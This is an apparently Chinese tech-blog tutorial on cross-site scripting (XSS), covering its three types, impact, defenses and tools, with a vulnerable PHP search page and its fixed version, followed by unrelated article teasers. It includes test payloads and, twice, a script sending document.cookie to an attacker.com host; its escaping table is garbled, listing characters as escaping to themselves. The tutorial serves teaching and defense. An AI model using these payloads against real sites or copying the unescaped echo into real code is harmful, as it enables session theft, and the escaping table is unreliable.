当前位置：首页 > news >正文

跨站脚本攻击（XSS）详解

news 来源：原创 2025/7/13 19:02:01

跨站脚本攻击（XSS）详解

跨站脚本攻击（XSS，Cross-Site Scripting）是一种通过在网页中注入恶意脚本，攻击用户浏览器的漏洞。攻击者可以利用XSS窃取用户敏感信息、劫持会话、或在受害者浏览器中执行恶意操作。

一、XSS的类型

1. 反射型 XSS（Reflected XSS）

特点：
- 恶意脚本通过 URL 参数传递，受害者访问后立即触发。
- 通常出现在搜索框、URL参数等直接输出到页面的地方。
实例：
```
http://example.com/search?q=<script>alert('XSS')</script> 
```
如果应用直接将q参数值显示在页面上而未过滤，就会触发XSS。

2. 存储型 XSS（Stored XSS）

特点：
- 恶意脚本存储在服务器中（如评论区、消息板）。
- 每次其他用户访问存储内容时，脚本会自动执行。
实例：攻击者在评论区插入恶意代码：
```
<script>document.location='http://attacker.com?cookie='+document.cookie</script> 
```
当其他用户访问该评论时，浏览器会执行脚本，将其Cookie发送给攻击者。

3. DOM型 XSS（DOM-based XSS）

特点：
- 恶意脚本直接利用浏览器的文档对象模型（DOM），而非服务器响应内容。
- 常见于通过 JavaScript 操作 DOM 的动态网页。

实例：一个动态网页的JavaScript代码：

var search = location.hash.substring(1); // 获取URL中的hash部分 document.getElementById("output").innerHTML = search;

如果用户访问以下URL，可能触发XSS：

http://example.com/#<script>alert('XSS')</script>

二、XSS的实现过程

1. 注入恶意代码

攻击者在输入字段或URL中注入恶意脚本。
目标网页未对输入内容进行充分过滤或转义。

2. 恶意代码执行

浏览器在渲染网页时执行攻击者注入的代码。
可能的后果包括：
- 窃取用户会话Cookie。
- 模拟用户操作。
- 重定向用户到恶意网站。

3. 数据传输

恶意脚本通过HTTP请求将窃取的数据发送到攻击者服务器。

三、XSS的危害

窃取用户会话：
- 攻击者通过获取受害者的会话Cookie，冒充用户身份登录。
```
<script>document.location='http://attacker.com?cookie='+document.cookie</script> 
```
伪造内容和操作：
- 攻击者伪造网站内容，欺骗用户执行恶意操作（如转账、购买）。
分发恶意代码：
- 利用XSS传播木马程序或病毒。
钓鱼攻击：
- 注入伪造登录表单，窃取用户的账号密码。

四、防御措施

1. 输入过滤

对所有用户输入的数据进行严格验证：
- 仅允许白名单字符。
- 拒绝特殊字符（如<、>、"、'、/等）。

2. 输出转义

在将用户数据插入HTML、JavaScript、或CSS时，对特殊字符进行转义：
- 使用HTML转义字符：
  - < 转义为 <
  - > 转义为 >
  - " 转义为 "
  - ' 转义为 '

3. 使用安全编码库

使用框架自带的防御机制：
- 如：Java的 ESAPI，Python的 Jinja2，或PHP的 htmlspecialchars 函数。

4. 设置Content Security Policy (CSP)

配置CSP限制网页中可以执行的脚本来源。

Content-Security-Policy: default-src 'self'; script-src 'self' https://trustedscripts.example.com

5. Cookie安全设置

设置Cookie为HttpOnly和Secure，防止通过JavaScript访问Cookie：
```
Set-Cookie: SESSIONID=abc123; HttpOnly; Secure 
```

五、攻击工具

1. BeEF（Browser Exploitation Framework）

一个专门用于浏览器攻击的工具，可以利用XSS漏洞执行各种操作。

2. XSSer

自动化的XSS检测工具，可扫描和利用XSS漏洞。

3. Burp Suite

专业的漏洞检测和利用工具，可以用来发现和测试XSS漏洞。

六、实例分析

漏洞代码

一个存在反射型XSS漏洞的示例：

<html>
<body>
<form action="search.php" method="get">
<input type="text" name="q">
<button type="submit">Search</button>
</form>
<?php
echo "Search results for: " . $_GET['q'];
?>
</body>
</html>

攻击演示

访问以下URL可触发漏洞：

http://example.com/search.php?q=<script>alert('XSS')</script>

修复代码

使用转义函数对输出进行过滤：

<?php echo "Search results for: " . htmlspecialchars($_GET['q'], ENT_QUOTES, 'UTF-8'); ?>

通过及时识别和修复漏洞、使用安全编码实践和部署防御技术，可以有效预防XSS攻击的发生。

跨站脚本攻击（XSS）详解

跨站脚本攻击（XSS）详解跨站脚本攻击（XSS，Cross-Site Scripting）是一种通过在网页中注入恶意脚本，攻击用户浏览器的漏洞。攻击者可以利用XSS窃取用户敏感信息、劫持会话、或在受害者浏览器中执行恶意操作。…...

编程日记 2025/7/13 19:02:01

【图像加密解密】Logistic混沌映射的彩色图像加密算法复现（含相关性检验）【Matlab完整源码 1期】

1、说明本文给出详细完整代码、完整的实验报告和PPT。环境：MATLAB2019a 复现文献：[1]黄硕.基于改进的Logistic混沌映射彩色图像加密算法[J].河南工程学院学报(自然科学版),2015,27(02):63-67. 主要目的是为了快速了解何为混沌序列、混沌序列产生、…...

编程日记 2025/7/14 6:28:28

VUE学习

import { ref } from vue; 引入了 Vue 的 ref 函数，用于创建响应式数据。const message ref(Hello Vue3); 创建了一个响应式变量 message 并初始化为字符串 Hello Vue3。<h1>{{ message }}</h1> 使用了 Vue 的插值表达式 {{ message }} 来显示 message…...

编程日记 2025/7/14 7:10:48

buildroot 编译 x264 及 ffmpeg 依赖安装x264编译安装解压源码并修改配置文件配置及编译编译错误： aarch64-linux-ar: two different operation options specified编译结果ffmpeg安装源码编译错误： ERROR: x264 not found using pkg-config为在rk3568平台上开发音视频采集及…...

编程日记 2025/7/14 1:28:29

HarmonyOS开发：ArkTS初识

ArkTS基本语法 ArkTS语言简介 ArkTS是鸿蒙生态的应用开发语言。基本语法风格与TypeScript（简称TS）相似，在TS的生态基础上进一步扩展，继承了TS的所有特性，是TS的超集。基本语法概述扩展能力基础语法&#xff1a…...

编程日记 2025/7/14 7:31:23

C++ STL map和set的使用

序列式容器和关联式容器想必大家已经接触过一些容器如：list，vector，deque，array，forward_list，string等，这些容器统称为系列容器。因为逻辑结构为线性的，两个位置的存储的值一般是…...

编程日记 2025/7/13 17:03:56

VisionPro软件Image Stitch拼接算法

2D图像拼接的3种情景 1.一只相机取像位置固定，或者多只相机固定位置拍图，硬拷贝拼图，采用CopyRegion工具实现 2.一只或多只相机在多个位置拍照，相机视野互相重叠，基于Patmax特征定位后，无缝拼图&#xff…...

编程日记 2025/7/14 8:06:31

缓存-Redis-缓存更新策略-主动更新策略-Cache Aside Pattern（全面易理解）

**Cache-Aside Pattern（旁路缓存模式）**是一种广泛应用于缓存管理的设计模式，尤其在使用 Redis 作为缓存层时尤为常见。该模式通过在应用程序与缓存之间引入一个旁路，确保数据的一致性和高效性。本文将在之前讨论的 Redis 主动更新…...

编程日记 2025/7/14 7:17:17

Linux(Centos 7.6)命令详解：cd

1.命令作用改变当前工作目录(change directory) 2.命令语法 Usage: cd [-L|[-P [-e]]] [dir] 3.参数详解 -L‌，当目标路径是符号链接时，强制使用符号链接，这是一个默认选项。-P‌，使用物理路径代替符号链接。-e‌&#xff0…...

编程日记 2025/7/14 1:03:51

oracle位运算、左移右移、标签算法等

文章目录位运算基础与或非同或同或应用场景异或异或应用场景什么是真值表 oracle基础函数创建bitor(按位或)函数bitnot(按位非)函数bitxor(按位异或)函数左移函数BITSHIFT()函数(实测不可用，废弃掉该方案)右移函数(略，有此场景吗?) 实际应用资质字典…...

编程日记 2025/7/12 21:01:46

预训练语言模型——BERT

1.预训练思想有了预训练就相当于模型在培养大学生做任务，不然模型初始化再做任务就像培养小学生当前数据层面的瓶颈是能用于预训练的语料快被用完了现在有一个重要方向是让机器自己来生成数据并做微调 1.1 预训练（Pre - training）vs. 传…...

编程日记 2025/7/13 9:09:17

基于Thinkphp6+uniapp的陪玩陪聊软件开发方案分析

使用uni-app框架进行前端开发。uni-app是一个使用Vue.js开发所有前端应用的框架，支持一次编写，多端发布，包括APP、小程序、H5等。使用Thinkphp6框架进行后端开发。Thinkphp6是一个轻量级、高性能、面向对象的PHP开发框架，具有易…...

编程日记 2025/7/10 17:42:29

C++异常处理

C异常处理 C中的异常处理机制是通过try、throw和catch三个关键字来实现的，主要用于捕获和处理程序执行过程中可能出现的错误或异常情况，从而提高程序的健壮性和可维护性。基本概念 try块：用于定义一个可能抛出异常的代码块。在这个代码块…...

编程日记 2025/7/14 7:33:30

UVM: TLM机制

topic overview 不建议的方法：假如没有TLM TLM TLM 1.0 整个TLM机制下，底层逻辑离不开动作发起者和被动接受者这个底层的模型基础，但实际上，在验证环境中，任何一个组件，都有可能成为动作的发起者&#xff0…...

编程日记 2025/7/10 7:21:50

基于机器学习的故障诊断（入门向）

一、原始信号的特征提取 1.EMD经验模态分解的作用信号分析：EMD可以将信号分解为多个IMFs，每个IMF代表信号中的一个特定频率和幅度调制的成分。这使得EMD能够提供对信号的时频特征进行分析的能力（特征提取用到的）。信号去噪&…...

编程日记 2025/7/14 6:43:39

Linux 磁盘管理命令：使用xfs 管理命令

文章目录 Linux磁盘管理命令使用xfs 管理命令1.命令说明2．建立 XFS 文件系统4．调整 XFS 文件系统各项参数5．在线调整 XFS 文件系统的大小6．暂停和恢复 XFS 文件系统7．尝试修复受损的 XFS 文件系统8．备份和恢…...

编程日记 2025/7/14 6:35:40

《Spring Framework实战》8：4.1.3.Bean 概述

欢迎观看《Spring Framework实战》视频教程 Spring IoC 容器管理一个或多个 bean。这些 bean 是使用您提供给容器的配置元数据（例如，以 XML <bean/>定义的形式）。在容器本身中，这些 bean 定义表示为BeanDefinition对象&a…...

编程日记 2025/7/14 1:53:45

Spring Boot教程之五十二：CrudRepository 和 JpaRepository 之间的区别

Spring Boot – CrudRepository 和 JpaRepository 之间的区别 Spring Boot建立在 Spring 之上，包含 Spring 的所有功能。由于其快速的生产就绪环境，使开发人员能够直接专注于逻辑，而不必费力配置和设置，因此如今它正成为开发人员…...

编程日记 2025/7/14 7:33:30

MyBatis面试-1

1、什么是MyBatis？ MyBatis是一个半ORM框架(对象关系映射)。---》Hibernate全ORM框架 ---》基于JDBC封装的框架专注于SQL语句，不用关心JDBC操作的其他流程 2、MyBatis有什么优点基于SQL语句的编程，相对来说会更加的灵活和JDBC相比&#…...

编程日记 2025/7/14 6:11:59

GDPU Android移动应用重点习题集

目录程序填空 ppt摘选题目摘选 “就这两页ppt，你还背不了吗” “。。。” 打开ppt后 “Sorry咯，还真背不了😜” 程序填空网上摘选的大题也挺合适的，太难的帮大家过滤掉了，大家可以看一下。 ✨SharedPrefere…...

编程日记 2025/7/14 7:20:28

软件开发为什么要用CI/CD方法

现代化业务离不开应用。事实上，62% 的企业认为，应用对其业务至关重要，还有 36% 的企业认为，通过应用提升了竞争优势2。快速可靠的应用开发是在数字世界取得成功的关键。持续集成/持续部署（CI/ CD）方法可帮助…...

编程日记 2025/7/14 7:14:24

湘潭大学人机交互复习

老师没给题型也没划重点，随便看看复习了什么是人机交互人机交互（Human-Computer Interaction，HCI）是关于设计、评价和实现供人们使用的交互式计算机系统，并围绕相关的主要现象进行研究的学科。人机交互研究内容 …...

编程日记 2025/7/10 17:42:18

Java高频面试之SE-10

hello啊，各位观众姥爷们！！！本牛马baby今天又来了！哈哈哈哈哈嗝🐶 equals和的区别？ 在 Java 中，equals() 方法和运算符都是用于比较两个对象之间的相等性，但它们的工…...

编程日记 2025/7/13 22:16:51

Java 注解详解：RetentionPolicy 与 ElementType

文章目录 1. RetentionPolicy：注解的生命周期RetentionPolicy 的详细说明SOURCE 示例CLASS 示例RUNTIME 示例 2. ElementType：注解的应用范围ElementType 的详细说明ElementType 示例用于类用于方法用于局部变量 3. RetentionPolicy 与 ElementType 的结…...

编程日记 2025/7/12 21:44:00

javafx 将项目打包为 Windows 的可执行文件exe

要将 JavaFX 项目打包为 .exe 文件，你可以使用一些工具将你的应用程序封装为 Windows 可执行文件。以下是两种常用的方法： 方法 1：使用 jpackage（适用于 JDK 14 及更高版本） jpackage 是 JDK 内置的工具，…...

编程日记 2025/7/14 4:47:28

使用Chrome谷歌浏览器中内置翻译功能

谷歌Chrome浏览器作为全球最受欢迎的网络浏览器之一，提供了强大且便捷的内置翻译功能。这一功能帮助用户轻松跨越语言障碍，浏览试听包括音乐视频直播等网页内容了。一、启用Chrome内置翻译功能 1、打开谷歌Chrome浏览器：确保你已经安装了最…...

编程日记 2025/7/13 6:02:04

Clojure语言的数据库编程

Clojure语言的数据库编程引言在当今社会，数据的处理和管理已经成为一个不可或缺的部分。无论是互联网应用、企业系统还是移动应用，都需要与数据库进行频繁的交互。因此，选择一种合适的编程语言和相应的库来进行数据库编程显得尤为重要。C…...

编程日记 2025/7/10 17:42:09

从零开始：使用VSCode搭建Python数据科学开发环境

引言在数据科学领域，一个高效、稳定的开发环境是成功的关键。本文将详细介绍如何使用Visual Studio Code搭建一个完整的Python数据科学开发环境。通过本指南，您将学会： 安装和配置VSCode，包括基本设置和快捷键配置设置Python开…...

编程日记 2025/7/13 18:43:48

docker minio镜像arm64架构

minio版本为RELEASE.2021-09-03T03-56-13Z 原项目信创改造，服务器资源改为了arm64架构，统信uos docker镜像库内没有对应的minio镜像，当前镜像为拉取源码后，自编译打包镜像，亲测可用。使用方式将tar包导入到服务器…...

编程日记 2025/7/12 8:22:27

arcgisPro加载CGCS2000天地图后，如何转成米单位

1、导入加载的天地图影像服务，一开始是经纬度显示的。 2、右键地图，选择需要调整的投影坐标，这里选择坐标如下： 3、点击确定后，就可以调整成米单位的了。 4、切换后结果如下： 如有需要，可调整成…...

编程日记 2025/7/12 14:12:01

MySQL Binlog 监听方案

如果 EmbeddedEngine 类在 debezium-connector-mysql 中不可用，原因是 Debezium 的新版本移除了 EmbeddedEngine。这是因为 Debezium 的架构变更，它现在鼓励使用 Kafka Connect 或 Debezium Server 来处理数据变更事件。下面是几种替代方法来实现 MySQ…...

编程日记 2025/7/10 5:17:30

openai swarm agent框架源码详解及应用案例实战

文章目录简介数据类型Agent类Response类Result类Swarm类run_demo_loop交互式会话基础应用agent-handsofffunction-callingcontext_variablestriage_agent 高阶应用通用客服机器人(support bot)构建航班服务agent 参考资料 openai 在24年10月份开源了一个教育性质的多agents协…...

编程日记 2025/7/10 17:41:59

Qt 5.14.2 学习记录 —— 팔 QWidget 常用控件（3）

文章目录 1、cursor2、font3、toolTip4、focusPolicy5、styleSheet 1、cursor 改变鼠标光标形状。在Qt Designer界面中，拖一个按钮过来，右边属性面用户可以自己改cursor属性。代码方法，先拖一个按钮到界面上： #include <Q…...

编程日记 2025/7/12 16:59:48

Nginx (40分钟学会，快速入门)

目录一、什么是Nginx ? 可以做什么 ？ 二、正向代理和反向代理三、负载均衡四、动静分离五、Nginx 常用命令六、Nginx实战及总结一、什么是Nginx ? 可以做什么 ？ Nginx 是高性能的 HTTP 和反向代理的 web 服务器&#xff0c…...

编程日记 2025/7/10 17:41:56

C# 中await和async的用法(一)

在 C# 中，await 关键字用于异步编程，配合 async 方法一起使用。await 允许你等待异步操作完成，而不会阻塞当前线程。简而言之，await 会暂停当前方法的执行，直到任务完成，然后继续执行。 1. await与async的关…...

编程日记 2025/7/14 7:46:22

前端JS中var、let、const之间的区别

🎬 江城开朗的豌豆：个人主页 🔥 个人专栏 :《 VUE 》《 javaScript 》 📝 个人网站 :《江城开朗的豌豆🫛 》 ⛺️ 生活的理想，就是为了理想的生活 ! 目录一、var 二、let 三、const 四、区别变量…...

编程日记 2025/7/13 13:58:04

【pyqt】（八）ui文件使用

ui文件使用前面我们已经学过了简单的UI文件创建（利用Qt Designer）和基础控件的使用。现在我们学习如何把二者融合起来完成开发。UI文件以 XML 格式存储界面的布局和各种控件的属性，我们可以利用Qt Designer开发界面，然后利用代码…...

编程日记 2025/7/10 18:47:45

H2数据库在单元测试中的应用

H2数据库特征用比较简洁的话来介绍h2数据库，就是一款轻量级的内存数据库，支持标准的SQL语法和JDBC API，工业领域中，一般会使用h2来进行单元测试。这里贴一下h2数据库的主要特征 Very fast database engineOpen sourceWritten…...

编程日记 2025/7/11 21:56:39

ios越狱脚本巨魔商店安装教程

使用爱思助手安装安装爱思助手：在电脑上安装 iTunes 和爱思助手，并使用 Apple ID 登录2。 IPA 签名：打开爱思助手，选择工具箱中的 IPA 签名。点击添加 IPA 文件，选择下载的 TrollInstallerX.ipa 文件。选择使用 Apple…...

编程日记 2025/7/12 15:57:50

Linux C编程——文件IO基础

文件IO基础一、简单的文件 IO 示例二、文件描述符三、open 打开文件1. 函数原型2. 文件权限3. 宏定义文件权限4. 函数使用实例四、write 写文件五、read 读文件六、close 关闭文件七、Iseek 绍 Linux 应用编程中最基础的知识，即文件 I/O（Input、Outout…...

编程日记 2025/7/13 1:27:40